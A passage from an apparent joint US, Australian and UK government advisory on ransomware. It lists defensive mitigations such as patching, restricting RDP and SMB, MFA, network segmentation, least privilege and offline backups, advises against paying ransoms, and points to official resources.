  • Keep all operating systems and software up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Regularly check for software updates and end of life (EOL) notifications, and prioritize patching known exploited vulnerabilities. In cloud environments, ensure that virtual machines, serverless applications, and third-party libraries are also patched regularly, as doing so is usually the customer’s responsibility. Automate software security scanning and testing when possible. Consider upgrading hardware and software, as necessary, to take advantage of vendor-provided virtualization and security capabilities.
  • If you use RDP or other potentially risky services, secure and monitor them closely.
    • Limit access to resources over internal networks, especially by restricting RDP and using virtual desktop infrastructure. After assessing risks, if RDP is deemed operationally necessary, restrict the originating sources and require MFA to mitigate credential theft and reuse. If RDP must be available externally, use a virtual private network (VPN), virtual desktop infrastructure, or other means to authenticate and secure the connection before allowing RDP to connect to internal devices. Monitor remote access/RDP logs, enforce account lockouts after a specified number of attempts to block brute force campaigns, log RDP login attempts, and disable unused remote access/RDP ports.
    • Ensure devices are properly configured and that security features are enabled. Disable ports and protocols that are not being used for a business purpose (e.g., RDP Transmission Control Protocol Port 3389). 
    • Restrict Server Message Block (SMB) Protocol within the network to only access servers that are necessary, and remove or disable outdated versions of SMB (i.e., SMB version 1). Threat actors use SMB to propagate malware across organizations.
    • Review the security posture of third-party vendors and those interconnected with your organization. Ensure all connections between third-party vendors and outside software or hardware are monitored and reviewed for suspicious activity.
    • Implement listing policies for applications and remote access that only allow systems to execute known and permitted programs under an established.
    • Open document readers in protected viewing modes to help prevent active content from running.
  • Implement a user training program and phishing exercises to raise awareness among users about the risks of visiting suspicious websites, clicking on suspicious links, and opening suspicious attachments. Reinforce the appropriate user response to phishing and spearphishing emails. 
  • Require MFA for as many services as possible—particularly for webmail, VPNs, accounts that access critical systems, and privileged accounts that manage backups. 
  • Require all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to have strong, unique passwords. Passwords should not be reused across multiple accounts or stored on the system where an adversary may have access. Note: devices with local admin accounts should implement a password policy, possibly using a password management solution (e.g., Local Administrator Password Solution [LAPS]), that requires strong, unique passwords for each admin account.
  • If using Linux, use a Linux security module (such as SELinux, AppArmor, or SecComp) for defense in depth. The security modules may prevent the operating system from making arbitrary connections, which is an effective mitigation strategy against ransomware, as well as against remote code execution (RCE).
  • Protect cloud storage by backing up to multiple locations, requiring MFA for access, and encrypting data in the cloud. If using cloud-based key management for encryption, ensure that storage and key administration roles are separated.

Malicious cyber actors use system and network discovery techniques for network and system visibility and mapping. To limit an adversary’s ability to learn an organization’s enterprise environment and to move laterally, take the following actions: 

  • Segment networks. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement. Organizations with an international footprint should be aware that connectivity between their overseas arms can expand their threat surface; these organizations should implement network segmentation between international divisions where appropriate. For example, the ACSC has observed ransomware and data theft incidents in which Australian divisions of multinational companies were impacted by ransomware incidents affecting assets maintained and hosted by offshore divisions (outside their control).
  • Implement end-to-end encryption. Deploying mutual Transport Layer Security (mTLS) can prevent eavesdropping on communications, which, in turn, can prevent cyber threat actors from gaining insights needed to advance a ransomware attack.
  • Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a network-monitoring tool. To aid in detecting the ransomware, leverage a tool that logs and reports all network traffic, including lateral movement on a network. Endpoint detection and response tools are particularly useful for detecting lateral connections as they have insight into unusual network connections for each host. Artificial intelligence (AI)-enabled network intrusion detection systems (NIDS) are also able to detect and block many anomalous behaviors associated with early stages of ransomware deployment.
  • Document external remote connections. Organizations should document approved solutions for remote management and maintenance. If an unapproved solution is installed on a workstation, the organization should investigate it immediately. These solutions have legitimate purposes, so they will not be flagged by antivirus vendors.
  • Implement time-based access for privileged accounts. For example, the just-in-time access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the zero trust model) by setting network-wide policy to automatically disable admin accounts at the Active Directory level. As needed, individual users can submit requests through an automated process that enables access to a system for a set timeframe. In cloud environments, just-in-time elevation is also appropriate and may be implemented using per-session federated claims or privileged access management tools.
  • Enforce principle of least privilege through authorization policies. Minimize unnecessary privileges for identities. Consider privileges assigned to human identities as well as non-person (e.g., software) identities. In cloud environments, non-person identities (service accounts or roles) with excessive privileges are a key vector for lateral movement and data access. Account privileges should be clearly defined, narrowly scoped, and regularly audited against usage patterns.
  • Reduce credential exposure. Accounts and their credentials present on hosts can enable further compromise of a network. Enforcing credential protection—by restricting where accounts and credentials can be used and by using local device credential protection features—reduces opportunities for threat actors to collect credentials for lateral movement and privilege escalation.
  • Disable unneeded command-line utilities; constrain scripting activities and permissions, and monitor their usage. Privilege escalation and lateral movement often depend on software utilities that run from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally. Organizations should also disable macros sent from external sources via Group Policy.
  • Maintain offline (i.e., physically disconnected) backups of data, and regularly test backup and restoration. These practices safeguard an organization’s continuity of operations or at least minimize potential downtime from an attack as well as protect against data losses. In cloud environments, consider leveraging native cloud service provider backup and restoration capabilities. To further secure cloud backups, consider separation of account roles to prevent an account that manages the backups from being used to deny or degrade the backups should the account become compromised. 
  • Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure. Consider storing encryption keys outside the cloud. Cloud backups that are encrypted using a cloud key management service (KMS) could be affected should the cloud environment become compromised. 
  • Collect telemetry from cloud environments. Ensure that telemetry from cloud environments—including network telemetry (e.g., virtual private cloud [VPC] flow logs), identity telemetry (e.g., account sign-on, token usage, federation configuration changes), and application telemetry (e.g., file downloads, cross-organization sharing)—is retained and visible to the security team.

Note: critical infrastructure organizations with industrial control systems/operational technology networks should review joint CISA-FBI Cybersecurity Advisory DarkSide Ransomware: Best Practices for Preventing Business Disruption from Ransomware Attacks for more recommendations, including mitigations to reduce the risk of severe business or functional degradation should their entity fall victim to ransomware. 

Responding to Ransomware Attacks

If a ransomware incident occurs at your organization, cybersecurity authorities in the United States, Australia, and the United Kingdom recommend organizations:

Note: cybersecurity authorities in the United States, Australia, and the United Kingdom strongly discourage paying a ransom to criminal actors. Criminal activity is motivated by financial gain, so paying a ransom may embolden adversaries to target additional organizations (or re-target the same organization) or encourage cyber criminals to engage in the distribution of ransomware. Paying the ransom also does not guarantee that a victim’s files will be recovered. Additionally, reducing the financial gain of ransomware threat actors will help disrupt the ransomware criminal business model.

Additionally, NCSC-UK reminds UK organizations that paying criminals is not condoned by the UK Government. In instances where a ransom paid, victim organizations often cease engagement with authorities, who then lose visibility of the payments made. While it continues to prove challenging, the NCSC-UK has supported UK Government efforts by identifying needed policy changes—including measures about the cyber insurance industry and ransom payments—that could reduce the threat of ransomware. 

Resources
  • For more information and resources on protecting against and responding to ransomware, refer to StopRansomware.gov, a centralized, U.S. whole-of-government webpage providing ransomware resources and alerts.
  • CISA’s Ransomware Readiness Assessment is a no-cost self-assessment based on a tiered set of practices to help organizations better assess how well they are equipped to defend and recover from a ransomware incident.
  • CISA offers a range of no-cost cyber hygiene services to help critical infrastructure organizations assess, identify, and reduce their exposure to threats, including ransomware. By requesting these services, organizations of any size could find ways to reduce their risk and mitigate attack vectors.
  • The U.S. Department of State’s Rewards for Justice (RFJ) program offers a reward of up to $10 million for reports of foreign government malicious activity against U.S. critical infrastructure. See the RFJ website for more information and how to report information securely.
  • The ACSC recommends organizations implement eight essential mitigation strategies from the ACSC’s Strategies to Mitigate Cyber Security Incidents as a cybersecurity baseline. These strategies, known as the “Essential Eight,” make it much harder for adversaries to compromise systems.
  • Refer to the ACSC’s practical guides on how to protect yourself against ransomware attacks and what to do if you are held to ransom at cyber.gov.au.
  • Refer to NCSC-UK’s guides on how to protect yourself against ransomware attacks and how to respond to and recover from them at ncsc.gov.uk/ransomware/home
Disclaimer

The information in this report is being provided “as is” for informational purposes only. The FBI, CISA, NSA, ACSC, and NCSC-UK do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation.

References Revisions
  • February 9, 2022: Initial Version
  • February 10, 2022: Replaced PDF with 508 compliant PDF

This product is provided subject to this Notification and this Privacy & Use policy.

Categories: Security Alerts
Syndicate content